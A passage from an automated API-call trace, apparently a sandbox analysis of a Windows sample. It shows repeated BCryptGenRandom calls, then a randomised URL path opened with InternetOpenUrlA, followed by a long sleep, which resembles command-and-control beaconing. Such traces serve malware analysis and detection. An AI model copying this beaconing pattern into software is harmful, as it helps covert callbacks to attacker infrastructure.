cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6005, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d6005) returned 0x0 [0261.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6036, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4d6036) returned 0x0 [0261.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.737] GetProcessHeap () returned 0x440000 [0261.737] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0261.737] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0261.737] lstrcatA (in: lpString1="\x04", lpString2="/sv7270aka6c37w2cf9s10k4lr8SkbTfLdwaw7butbA/j1sbkogSmvguqVUsa1KlqYnB/io5eb3ifxmbblliwh7e40l0c23xvxlhjnfoku7tUank8nvm9/1DAjdu7xd96qm0tuycgieQGay/" | out: lpString1="\x04/sv7270aka6c37w2cf9s10k4lr8SkbTfLdwaw7butbA/j1sbkogSmvguqVUsa1KlqYnB/io5eb3ifxmbblliwh7e40l0c23xvxlhjnfoku7tUank8nvm9/1DAjdu7xd96qm0tuycgieQGay/") returned="\x04/sv7270aka6c37w2cf9s10k4lr8SkbTfLdwaw7butbA/j1sbkogSmvguqVUsa1KlqYnB/io5eb3ifxmbblliwh7e40l0c23xvxlhjnfoku7tUank8nvm9/1DAjdu7xd96qm0tuycgieQGay/" [0261.737] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0261.737] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/sv7270aka6c37w2cf9s10k4lr8SkbTfLdwaw7butbA/j1sbkogSmvguqVUsa1KlqYnB/io5eb3ifxmbblliwh7e40l0c23xvxlhjnfoku7tUank8nvm9/1DAjdu7xd96qm0tuycgieQGay/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0261.737] GetProcessHeap () returned 0x440000 [0261.737] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0261.737] GetProcessHeap () returned 0x440000 [0261.737] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5fc0 | out: hHeap=0x440000) returned 1 [0261.738] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0261.738] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0261.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0261.738] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0261.738] Sleep (dwMilliseconds=0x17761) [0261.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0261.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.907] GetProcessHeap () returned 0x440000 [0261.907] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b720 [0261.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b721, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a1b721) returned 0x0 [0261.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.915] GetProcAddress 